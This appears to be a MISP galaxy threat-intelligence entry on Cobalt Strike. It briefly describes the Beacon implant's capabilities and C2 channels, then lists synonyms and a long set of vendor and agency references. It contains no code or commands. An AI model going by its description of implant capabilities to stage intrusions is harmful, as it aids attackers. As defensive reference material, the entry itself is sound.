Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon offers a wealth of functionality to the attacker, including, but not limited to, command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that, once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS and SMB named pipes, as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.
The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Cobalt Strike.
Known Synonyms |
---|
Agentemis |
BEACON |
CobaltStrike |
cobeacon |
Internal MISP references
UUID 1a1d3ea4-972e-4c48-8d85-08d9db8f1550
which can be used as unique global reference for Cobalt Strike
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike - webarchive
- https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/ - webarchive
- https://mez0.cc/posts/cobaltstrike-powershell-exec/ - webarchive
- https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf - webarchive
- https://www.sentinelone.com/labs/chinese-entanglement-dll-hijacking-in-the-asian-gambling-sector/ - webarchive
- https://breakpoint-labs.com/blog/cobalt-strike-and-ransomware-tracking-an-effective-ransomware-campaign/ - webarchive
- https://www.secureworks.com/blog/hades-ransomware-operators-use-distinctive-tactics-and-infrastructure - webarchive
- https://www.guidepointsecurity.com/from-zloader-to-darkside-a-ransomware-story/ - webarchive
- https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf - webarchive
- https://www.malware-traffic-analysis.net/2021/09/29/index.html - webarchive
- https://asec.ahnlab.com/ko/19860/ - webarchive
- https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks - webarchive
- https://hitcon.org/2024/CMT/slides/Pirates_of_The_Nang_Hai_Follow_the_Artifacts_of_Tropic_Trooper,_No_One_Knows.pdf - webarchive
- https://www.mandiant.com/resources/evolution-of-fin7 - webarchive
- https://www.esentire.com/blog/icedid-to-cobalt-strike-in-under-20-minutes - webarchive
- https://unit42.paloaltonetworks.com/cobalt-strike-memory-analysis/ - webarchive
- https://blogs.blackberry.com/en/2021/10/blackberry-shines-spotlight-on-evolving-cobalt-strike-threat-in-new-book - webarchive
- https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/ - webarchive
- https://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/ - webarchive
- https://blogs.blackberry.com/en/2020/12/mountlocker-ransomware-as-a-service-offers-double-extortion-capabilities-to-affiliates - webarchive
- https://blog.nviso.eu/2021/10/27/cobalt-strike-using-known-private-keys-to-decrypt-traffic-part-2/ - webarchive
- https://www.cynet.com/blog/orion-threat-alert-qakbot-ttps-arsenal-and-the-black-basta-ransomware/ - webarchive
- https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot - webarchive
- https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya - webarchive
- https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/ - webarchive
- https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/ - webarchive
- https://github.com/Still34/landing/blob/master/assets/slides/2024-08-Sailing%20the%20Seven%20SEAs.pdf - webarchive
- https://unit42.paloaltonetworks.com/bazarloader-network-reconnaissance/ - webarchive
- https://securityscorecard.com/blog/securityscorecard-finds-usaid-hack-much-larger-than-initially-thought - webarchive
- https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/ - webarchive
- https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/ - webarchive
- https://censys.com/a-beginners-guide-to-tracking-malware-infrastructure/ - webarchive
- https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/ - webarchive
- https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022 - webarchive
- https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html - webarchive
- https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/ - webarchive
- https://cocomelonc.github.io/malware/2022/09/06/malware-tricks-23.html - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-mohawk - webarchive
- https://www.volexity.com/blog/2021/05/27/suspected-apt29-operation-launches-election-fraud-themed-phishing-campaigns/ - webarchive
- https://socfortress.medium.com/detecting-cobalt-strike-beacons-3f8c9fdcb654 - webarchive
- https://www.securonix.com/blog/securonix-threat-research-security-advisory-frozenshadow-attack-campaign/ - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa21-148a - webarchive
- https://www.huntress.com/blog/cobalt-strike-analysis-of-obfuscated-malware - webarchive
- https://research.nccgroup.com/2020/06/15/striking-back-at-retired-cobalt-strike-a-look-at-a-legacy-vulnerability/ - webarchive
- https://twitter.com/RedDrip7/status/1402640362972147717?s=20 - webarchive
- https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee - webarchive
- https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/ - webarchive
- https://labs.k7computing.com/index.php/cobalt-strikes-deployment-with-hardware-breakpoint-for-amsi-bypass/ - webarchive
- https://www.inky.com/blog/colonial-pipeline-ransomware-hack-unleashes-flood-of-related-phishing-attempts - webarchive
- https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf - webarchive
- https://michaelkoczwara.medium.com/cobalt-strike-hunting-simple-pcap-and-beacon-analysis-f51c36ce6811 - webarchive
- https://twitter.com/Unit42_Intel/status/1458113934024757256 - webarchive
- https://forensicitguy.github.io/inspecting-powershell-cobalt-strike-beacon/ - webarchive
- https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine - webarchive
- https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/ - webarchive
- https://www.contextis.com/en/blog/dll-search-order-hijacking - webarchive
- https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam - webarchive
- https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/ - webarchive
- https://mergene.medium.com/enterprise-scale-threat-hunting-network-beacon-detection-with-unsupervised-machine-learning-and-277c4c30304f - webarchive
- https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/ - webarchive
- https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon - webarchive
- https://blog.malwarebytes.com/threat-intelligence/2021/11/a-multi-stage-powershell-based-attack-targets-kazakhstan/ - webarchive
- https://cybleinc.com/2020/11/17/oceanlotus-continues-with-its-cyber-espionage-operations/ - webarchive
- https://decoded.avast.io/luigicamastra/backdoored-client-from-mongolian-ca-monpass - webarchive
- https://github.com/Sentinel-One/CobaltStrikeParser/blob/master/parse_beacon_config.py - webarchive
- https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/ - webarchive
- https://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/ - webarchive
- https://www.youtube.com/watch?v=GfbxHy6xnbA - webarchive
- https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/ - webarchive
- https://news.sophos.com/en-us/2021/06/02/amsi-bypasses-remain-tricks-of-the-malware-trade/ - webarchive
- https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf - webarchive
- https://x.com/embee_research/status/1737325167024738425?s=46 - webarchive
- https://thedfirreport.com/2021/06/20/from-word-to-lateral-movement-in-1-hour/ - webarchive
- https://thehackernews.com/2022/05/malware-analysis-trickbot.html - webarchive
- https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-custom-packer/ - webarchive
- https://thedfirreport.com/2022/03/07/2021-year-in-review/ - webarchive
- https://www.netresec.com/?page=Blog&month=2024-01&post=Hunting-for-Cobalt-Strike-in-PCAP - webarchive
- https://www.prodaft.com/m/reports/WizardSpider_TLPWHITE_v.1.4.pdf - webarchive
- https://www.mandiant.com/resources/spear-phish-ukrainian-entities - webarchive
- https://github.com/blackorbird/APT_REPORT/blob/master/Oceanlotus/apt32_report_2019.pdf - webarchive
- https://blog.didierstevens.com/2021/11/03/new-tool-cs-extract-key-py/ - webarchive
- https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-14cc543af811 - webarchive
- https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa21-265a - webarchive
- https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone/ - webarchive
- https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack - webarchive
- https://embeeresearch.io/ghidra-basics-shellcode-analysis/ - webarchive
- https://thedfirreport.com/2021/05/02/trickbot-brief-creds-and-beacons/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue - webarchive
- https://jsac.jpcert.or.jp/archive/2024/pdf/JSAC2024_2_7_hara_shoji_higashi_vickie-su_nick-dai_en.pdf - webarchive
- https://redcanary.com/blog/intelligence-insights-december-2021 - webarchive
- https://www.youtube.com/watch?v=6SDdUVejR2w - webarchive
- https://blog.group-ib.com/opera1er-apt - webarchive
- https://www.cynet.com/attack-techniques-hands-on/threats-looming-over-the-horizon/ - webarchive
- https://isc.sans.edu/diary/Bumblebee+Malware+from+TransferXL+URLs/28664 - webarchive
- https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf - webarchive
- https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html - webarchive
- https://web.br.de/interaktiv/ocean-lotus/en/ - webarchive
- https://isc.sans.edu/diary/rss/28934 - webarchive
- https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf - webarchive
- https://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html - webarchive
- https://blogs.blackberry.com/en/2021/08/blackberry-prevents-threat-actor-group-ta575-and-dridex-malware - webarchive
- https://www.guidepointsecurity.com/blog/a-ransomware-near-miss-proxyshell-a-rat-and-cobalt-strike/ - webarchive
- https://www.trendmicro.com/en_us/research/22/f/black-basta-ransomware-operators-expand-their-attack-arsenal-wit.html - webarchive
- https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/ - webarchive
- https://www.crowdstrike.com/blog/how-falcon-complete-disrupts-ecrime-operators-wizard-spider/ - webarchive
- https://blog.cyble.com/2022/06/23/matanbuchus-loader-resurfaces/ - webarchive
- https://github.com/swisscom/detections/blob/main/RYUK/cobaltstrike_c2s.txt - webarchive
- https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/ - webarchive
- https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2 - webarchive
- https://skyblue.team/posts/scanning-virustotal-firehose/ - webarchive
- https://www.seqrite.com/blog/operation-cobalt-whisper-targets-industries-hong-kong-pakistan/ - webarchive
- https://youtu.be/_VZCocEFHgk?feature=shared - webarchive
- https://github.com/0xjxd/SquirrelWaffle-From-Maldoc-to-Cobalt-Strike/raw/main/2021-10-02%20-%20SquirrelWaffle%20-%20From%20Maldoc%20to%20Cobalt%20Strike.pdf - webarchive
- https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/ - webarchive
- https://ti.qianxin.com/blog/articles/Operation-OceanStorm:The-OceanLotus-hidden-under-the-abyss-of-the-deep/ - webarchive
- https://ak100117.medium.com/analyzing-cobalt-strike-powershell-payload-64d55ed3521b - webarchive
- https://blog.exatrack.com/melofee/ - webarchive
- https://medium.com/cycraft/china-linked-threat-group-targets-taiwan-critical-infrastructure-smokescreen-ransomware-c2a155aa53d5 - webarchive
- https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html - webarchive
- https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023 - webarchive
- https://blog.nviso.eu/2022/03/22/cobalt-strike-overview-part-7/ - webarchive
- https://thedfirreport.com/2021/01/31/bazar-no-ryuk/ - webarchive
- https://embeeresearch.io/unpacking-malware-with-hardware-breakpoints-cobalt-strike/ - webarchive
- https://www.justice.gov/opa/pr/justice-department-announces-court-authorized-seizure-domain-names-used-furtherance-spear - webarchive
- https://401trg.com/burning-umbrella/
- https://unit42.paloaltonetworks.com/atoms/obscureserpens/ - webarchive
- https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/ - webarchive
- https://hunt.io/blog/tricks-treats-threats-cobalt-strike-the-goblin-lurking-in-plain-sight - webarchive
- https://community.riskiq.com/article/0bcefe76 - webarchive
- https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/ - webarchive
- https://www.telsy.com/download/5972/?uid=d7c082ba55 - webarchive
- https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/ - webarchive
- https://censys.com/a-beginners-guide-to-hunting-open-directories/ - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-cn-2024-1112.pdf - webarchive
- https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-winter - webarchive
- https://www.cyborgsecurity.com/blog/you-dont-know-the-hafnium-of-it/ - webarchive
- https://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware - webarchive
- https://www.advintel.io/post/blackcat-in-a-shifting-threat-landscape-it-helps-to-land-on-your-feet-tech-dive - webarchive
- http://blog.nsfocus.net/murenshark - webarchive
- https://kienmanowar.wordpress.com/2021/09/06/quick-analysis-cobaltstrike-loader-and-shellcode/ - webarchive
- https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html - webarchive
- https://threatpost.com/conti-ransomware-v-3-including-decryptor-leaked/179006/ - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/earth-baku-returns - webarchive
- https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/ - webarchive
- https://twitter.com/MsftSecIntel/status/1535417776290111489 - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx - webarchive
- https://blog.talosintelligence.com/2022/05/mustang-panda-targets-europe.html - webarchive
- https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html - webarchive
- https://www.accenture.com/us-en/blogs/security/ransomware-hades - webarchive
- https://blog.google/threat-analysis-group/how-we-protect-users-0-day-attacks/ - webarchive
- https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis - webarchive
- https://www.ncsc.gov.ie/pdfs/HSE_Conti_140521_UPDATE.pdf - webarchive
- https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/ - webarchive
- https://www.microsoft.com/security/blog/2021/07/29/bazacall-phony-call-centers-lead-to-exfiltration-and-ransomware/ - webarchive
- https://blog.cyble.com/2022/05/20/malware-campaign-targets-infosec-community-threat-actor-uses-fake-proof-of-concept-to-deliver-cobalt-strike-beacon/ - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a - webarchive
- https://research.checkpoint.com/2019/rancor-the-year-of-the-phish/ - webarchive
- https://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65 - webarchive
- https://www.incibe.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf - webarchive
- https://www.macnica.net/file/mpression_automobile.pdf - webarchive
- https://www.darktrace.com/en/blog/catching-apt-41-exploiting-a-zero-day-vulnerability/ - webarchive
- https://assets.virustotal.com/reports/2021trends.pdf - webarchive
- https://michaelkoczwara.medium.com/cobalt-strike-hunting-dll-hijacking-attack-analysis-ffbf8fd66a4e - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sodinokibi-ransomware-cobalt-strike-pos - webarchive
- https://blog.cyble.com/2022/06/07/bumblebee-loader-on-the-rise/ - webarchive
- https://intel471.com/blog/shipping-companies-ransomware-credentials - webarchive
- https://www.prevailion.com/what-wicked-webs-we-unweave/ - webarchive
- https://www.varonis.com/blog/hive-ransomware-analysis - webarchive
- https://www.zscaler.com/blogs/security-research/dodgebox-deep-dive-updated-arsenal-apt41-part-1 - webarchive
- https://www.youtube.com/watch?v=WW0_TgWT2gs - webarchive
- https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis - webarchive
- https://www.advintel.io/post/backup-removal-solutions-from-conti-ransomware-with-love - webarchive
- https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/ - webarchive
- https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf - webarchive
- https://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery - webarchive
- http://blog.morphisec.com/new-global-attack-on-point-of-sale-systems - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/ - webarchive
- https://www.trustnet.co.il/blog/virus-alert-to-powershell-encrypted-loader/ - webarchive
- https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f - webarchive
- https://www.getrevue.co/profile/80vul/issues/hunting-cobalt-strike-dns-redirectors-by-using-zoomeye-580734 - webarchive
- https://thedfirreport.com/2020/10/08/ryuks-return/ - webarchive
- https://medium.com/walmartglobaltech/trickbot-crews-new-cobaltstrike-loader-32c72b78e81c - webarchive
- https://blog.morphisec.com/proxyshell-exchange-exploitation-now-leads-to-an-increasing-amount-of-cobaltstrike-backdoors - webarchive
- https://elis531989.medium.com/the-squirrel-strikes-back-analysis-of-the-newly-emerged-cobalt-strike-loader-squirrelwaffle-937b73dbd9f9 - webarchive
- https://news.sophos.com/en-us/2021/10/04/atom-silo-ransomware-actors-use-confluence-exploit-dll-side-load-for-stealthy-attack/ - webarchive
- https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/542/original/CTIR_casestudy_2.pdf - webarchive
- https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/ - webarchive
- https://www.netresec.com/?page=Blog&month=2023-10&post=Forensic-Timeline-of-an-IcedID-Infection - webarchive
- https://www.arashparsa.com/catching-a-malware-with-no-name/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Q4%202023%20Botnet%20Threat%20Update.pdf - webarchive
- https://blog.truesec.com/2021/05/05/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies/ - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://securelist.com/cve-2024-30051/112618 - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/24/i/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac/IOCs%20-%20Earth%20Baxia%20Uses%20Spear-Phishing%20and%20GeoServer%20Exploit%20to%20Target%20APAC.txt - webarchive
- https://blog.gigamon.com/2021/09/10/rendering-threats-a-network-perspective/ - webarchive
- https://github.com/dodo-sec/Malware-Analysis/blob/main/Cobalt%20Strike/Indirect%20Syscalls.md - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf - webarchive
- https://www.lac.co.jp/lacwatch/report/20210521_002618.html - webarchive
- https://decoded.avast.io/luigicamastra/backdoored-client-from-mongolian-ca-monpass/ - webarchive
- https://nsfocusglobal.com/insights-into-ransomware-spread-using-exchange-1-day-vulnerabilities-1-2/ - webarchive
- https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot - webarchive
- https://blog.lumen.com/zuorat-hijacks-soho-routers-to-silently-stalk-networks/ - webarchive
- https://blog.nviso.eu/2021/11/03/cobalt-strike-using-process-memory-to-decrypt-traffic-part-3/ - webarchive
- https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview - webarchive
- https://www.malware-traffic-analysis.net/2021/09/17/index.html - webarchive
- https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/ - webarchive
- https://unit42.paloaltonetworks.com/fireeye-red-team-tool-breach/ - webarchive
- https://www.mandiant.com/resources/unc2452-merged-into-apt29 - webarchive
- https://blog.talosintelligence.com/2022/08/manjusaka-offensive-framework.html - webarchive
- https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf - webarchive
- https://intel471.com/blog/conti-emotet-ransomware-conti-leaks - webarchive
- https://twitter.com/Unit42_Intel/status/1461004489234829320 - webarchive
- https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility - webarchive
- https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/ - webarchive
- https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf - webarchive
- https://securelist.com/apt-trends-report-q2-2020/97937/ - webarchive
- https://twitter.com/cglyer/status/1480742363991580674 - webarchive
- https://quake.360.cn/quake/#/reportDetail?id=5fc6fedd191038c3b25c4950 - webarchive
- https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/ - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/diving-deeper-into-the-kaseya-vsa-attack-revil-returns-and-other-hackers-are-riding-their-coattails/ - webarchive
- https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ - webarchive
- https://www.cynet.com/orion-threat-alert-flight-of-the-bumblebee/ - webarchive
- https://www.advintel.io/post/24-hours-from-log4shell-to-local-admin-deep-dive-into-conti-gang-attack-on-fortune-500-dfir - webarchive
- https://www.silentpush.com/blog/consequences-the-conti-leaks-and-future-problems - webarchive
- https://www.youtube.com/watch?v=YDtLmhw_nTo - webarchive
- https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-1 - webarchive
- https://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike - webarchive
- https://jp.security.ntt/tech_blog/appdomainmanager-injection - webarchive
- https://experience.mandiant.com/trending-evil-2/p/1 - webarchive
- https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/ - webarchive
- https://labs.sentinelone.com/inside-a-trickbot-cobaltstrike-attack-server/ - webarchive
- https://blogs.blackberry.com/en/2022/01/log4u-shell4me - webarchive
- https://web.archive.org/web/20230209123148/https://www.cybereason.com/hubfs/THREAT%20ALERT%20GootLoader%20-%20Large%20payload%20leading%20to%20compromise%20(BLOG).pdf - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/cobalt-strike-favorite-tool-apt-crimeware - webarchive
- https://www.youtube.com/watch?v=YCwyc6SctYs - webarchive
- https://blog.sonatype.com/new-pymafka-malicious-package-drops-cobalt-strike-on-macos-windows-linux - webarchive
- https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf - webarchive
- https://www.esentire.com/blog/hacker-infrastructure-used-in-cisco-breach-discovered-attacking-a-top-workforce-management-corporation-russias-evil-corp-gang-suspected-reports-esentire - webarchive
- https://blog.fox-it.com/2023/11/01/popping-blisters-for-research-an-overview-of-past-payloads-and-exploring-recent-developments/ - webarchive
- https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure - webarchive
- https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html - webarchive
- https://thedfirreport.com/2022/01/24/cobalt-strike-a-defenders-guide-part-2/ - webarchive
- https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf - webarchive
- https://blog.viettelcybersecurity.com/apt32-deobfuscation-arsenal-deobfuscating-mot-vai-loai-obfucation-toolkit-cua-apt32-phan-2/ - webarchive
- https://twitter.com/GossiTheDog/status/1438500100238577670 - webarchive
- https://elastic.github.io/security-research/intelligence/2022/01/03.extracting-cobalt-strike-beacon/article/ - webarchive
- https://www.trendmicro.com/en_us/research/21/i/examining-the-cring-ransomware-techniques.html - webarchive
- https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html - webarchive
- https://twitter.com/Unit42_Intel/status/1421117403644186629?s=20 - webarchive
- https://news.sophos.com/en-us/2021/05/05/intervention-halts-a-proxylogon-enabled-attack - webarchive
- https://www.bleepingcomputer.com/news/security/emotet-now-drops-cobalt-strike-fast-forwards-ransomware-attacks/ - webarchive
- https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-two/ - webarchive
- https://news.sophos.com/en-us/2021/09/21/cring-ransomware-group-exploits-ancient-coldfusion-server/?cmp=30728 - webarchive
- https://research.nccgroup.com/2022/03/31/conti-nuation-methods-and-techniques-observed-in-operations-post-the-leaks/ - webarchive
- https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/ - webarchive
- https://www.youtube.com/watch?v=gfYswA_Ronw - webarchive
- https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/ - webarchive
- https://blog.talosintelligence.com/highlighting-ta866-asylum-ambuscade/ - webarchive
- https://twitter.com/AltShiftPrtScn/status/1403707430765273095 - webarchive
- https://speakerdeck.com/aragorntseng/winnti-is-coming-evolution-after-prosecution-at-hitcon2021 - webarchive
- https://www.elastic.co/blog/detecting-cobalt-strike-with-memory-signatures - webarchive
- https://www.intrinsec.com/proxynotshell-owassrf-merry-xchange/ - webarchive
- https://connormcgarr.github.io/thread-hijacking/ - webarchive
- https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/ - webarchive
- https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/ - webarchive
- https://thedfirreport.com/2020/04/24/ursnif-via-lolbins/ - webarchive
- https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/ - webarchive
- https://decoded.avast.io/threatintel/decoding-cobalt-strike-understanding-payloads/ - webarchive
- https://www.trendmicro.com/en_in/research/21/k/analyzing-proxyshell-related-incidents-via-trend-micro-managed-x.html - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/#id3 - webarchive
- https://blog.malwarebytes.com/threat-intelligence/2022/07/cobalt-strikes-again-uac-0056-continues-to-target-ukraine-in-its-latest-campaign/ - webarchive
- https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/ - webarchive
- https://www.microsoft.com/security/blog/2020/11/30/threat-actor-leverages-coin-miner-techniques-to-stay-under-the-radar-heres-how-to-spot-them/ - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf - webarchive
- https://lab52.io/blog/beyond-appearances-unknown-actor-using-apt29s-ttp-against-chinese-users/ - webarchive
- https://www.esentire.com/blog/increase-in-emotet-activity-and-cobalt-strike-deployment - webarchive
- https://blog.nviso.eu/2022/07/20/analysis-of-a-trojanized-jquery-script-gootloader-unleashed/ - webarchive
- https://d01a.github.io/syscalls/ - webarchive
- https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware - webarchive
- https://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489 - webarchive
- https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution - webarchive
- https://blog.group-ib.com/apt41-world-tour-2021 - webarchive
- https://blog.cobaltstrike.com/2020/03/04/cobalt-strike-joins-core-impact-at-helpsystems-llc/ - webarchive
- https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike - webarchive
- https://unit42.paloaltonetworks.com/cobalt-strike-team-server/ - webarchive
- https://blog.talosintelligence.com/2021/05/ctir-case-study.html - webarchive
- https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html - webarchive
- https://socprime.com/blog/uac-0057-attack-detection-a-surge-in-adversary-activity-distributing-picassoloader-and-cobalt-strike-beacon/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware - webarchive
- https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf - webarchive
- https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/ - webarchive
- https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom - webarchive
